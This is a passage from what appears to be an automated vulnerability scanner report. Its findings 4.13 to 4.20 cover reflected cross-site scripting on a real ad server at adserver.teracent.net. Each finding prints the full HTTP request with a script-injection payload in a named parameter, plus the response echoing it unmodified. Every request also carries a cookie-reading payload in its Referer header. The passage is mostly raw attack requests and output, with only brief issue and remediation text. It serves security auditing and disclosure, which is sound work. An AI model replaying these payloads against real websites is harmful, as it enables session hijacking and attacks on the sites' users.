GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C12959219866d9ad"-alert(1)-"f428853feb&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929627832_58540946_as2107_imp|285#1295929627832_58540946_as2107_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:07 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:07 GMT
Content-Length: 18401

<!DOCTYPE html>
<!-- Host: as2107 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
0,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C12959219866d9ad"-alert(1)-"f428853feb&Redirect=http://adserver.teracent.net/tase/redir/1295929627832_58540946_as2107_imp?q=H4sIAAAAAAAAAFVRy2rDMBD8lV2vno7oVafYpNBLCKKXQk8FP5TkKFw7OCFyzv2ufkJ_qHJIQnsQzDCzs7No8fX9E1oDpEiJjBMIQbY2aCtDmllviGv
...[SNIP]...

4.13. http://adserver.teracent.net/tase/ad [RawValues parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the RawValues request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca7d7"><script>alert(1)</script>68b15c3d96b was submitted in the RawValues parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986ca7d7"><script>alert(1)</script>68b15c3d96b&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929627752_58477304_as2109_imp|285#1295929627752_58477304_as2109_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:07 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:07 GMT
Content-Length: 18551

<!DOCTYPE html>
<!-- Host: as2109 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
0,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986ca7d7"><script>alert(1)</script>68b15c3d96b&Redirect=http://adserver.teracent.net/tase/redir/1295929627752_58477304_as2109_imp?q=H4sIAAAAAAAAAFWRP2vDMBDFv0iHO53-uqKrptik0CUY0aXQqeDYSjIK1w5OiB3o1m9dOcSlHQTvx717d5Ievr-GsLVAmmvSiqTk5Ibr3sYmTKGOfVe
...[SNIP]...

4.14. http://adserver.teracent.net/tase/ad [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the Redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f538"><script>alert(1)</script>d0808468015 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=2f538"><script>alert(1)</script>d0808468015 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929628077_58541665_as2105_imp|285#1295929628077_58541665_as2105_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:08 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:07 GMT
Content-Length: 18537

<!DOCTYPE html>
<!-- Host: as2105 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
6,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=2f538"><script>alert(1)</script>d0808468015http://adserver.teracent.net/tase/redir/1295929628077_58541665_as2105_imp?q=H4sIAAAAAAAAAFWRQWvDMAyF_4oUyY6dmV19akIHO6wUs8tgp0GauO0xZElJS5Oe96-nlLZsB4M-JL-nZyc_b3rj0H-VcXCrJNWaGXAhhU0I6FoAIa99eXBAJtFk2
...[SNIP]...

4.15. http://adserver.teracent.net/tase/ad [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d19ae"-alert(1)-"c6e6f69cf49 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=d19ae"-alert(1)-"c6e6f69cf49 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929628151_58475832_as2110_imp|285#1295929628151_58475832_as2110_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:08 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:07 GMT
Content-Length: 18411

<!DOCTYPE html>
<!-- Host: as2110 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
6,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=d19ae"-alert(1)-"c6e6f69cf49http://adserver.teracent.net/tase/redir/1295929628151_58475832_as2110_imp?q=H4sIAAAAAAAAAFVQy2rDMBD8h37Byrt6uaJXnWKTQi8hiF4KPRX8UJKjcO2ghNo590f6G_21yiE17UEwg2ZnZvfu8-s7DgZQkUIlUQOBI80F6QxdqBGAufhR2VibT
...[SNIP]...

4.16. http://adserver.teracent.net/tase/ad [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d118"-alert(1)-"ae01b33c400 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,1496439d118"-alert(1)-"ae01b33c400&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929626458_58541757_as2104_imp|285#1295929626458_58541757_as2104_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:06 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:05 GMT
Content-Length: 18388

<!DOCTYPE html>
<!-- Host: as2104 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,1496439d118"-alert(1)-"ae01b33c400&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2
...[SNIP]...

4.17. http://adserver.teracent.net/tase/ad [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the Segments request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c11df"><script>alert(1)</script>1d93e77bc17 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643c11df"><script>alert(1)</script>1d93e77bc17&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929626382_58666992_as2102_imp|285#1295929626382_58666992_as2102_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:06 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:05 GMT
Content-Length: 18533

<!DOCTYPE html>
<!-- Host: as2102 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643c11df"><script>alert(1)</script>1d93e77bc17&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2
...[SNIP]...

4.18. http://adserver.teracent.net/tase/ad [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc202"-alert(1)-"3e687818da was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438bc202"-alert(1)-"3e687818da&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929625354_58541718_as2104_imp|285#1295929625354_58541718_as2104_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:05 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:04 GMT
Content-Length: 18394

<!DOCTYPE html>
<!-- Host: as2104 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
salign: "tl",
staticBeaconUrl: "",
staticClickUrl: "http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438bc202"-alert(1)-"3e687818da&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,1
...[SNIP]...

4.19. http://adserver.teracent.net/tase/ad [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the TargetID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7798"><script>alert(1)</script>c562a1c893e was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438e7798"><script>alert(1)</script>c562a1c893e&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929625279_58477214_as2109_imp|285#1295929625279_58477214_as2109_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:05 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:04 GMT
Content-Length: 18538

<!DOCTYPE html>
<!-- Host: as2109 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<a href="http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438e7798"><script>alert(1)</script>c562a1c893e&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,1
...[SNIP]...

4.20. http://adserver.teracent.net/tase/ad [Targets parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the Targets request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf4f"><script>alert(1)</script>8f9396390d1 was submitted in the Targets parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977fbf4f"><script>alert(1)</script>8f9396390d1&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929626701_58475779_as2110_imp|285#1295929626701_58475779_as2110_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:06 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:06 GMT
Content-Length: 18990

<!DOCTYPE html>
<!-- Host: as2110 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
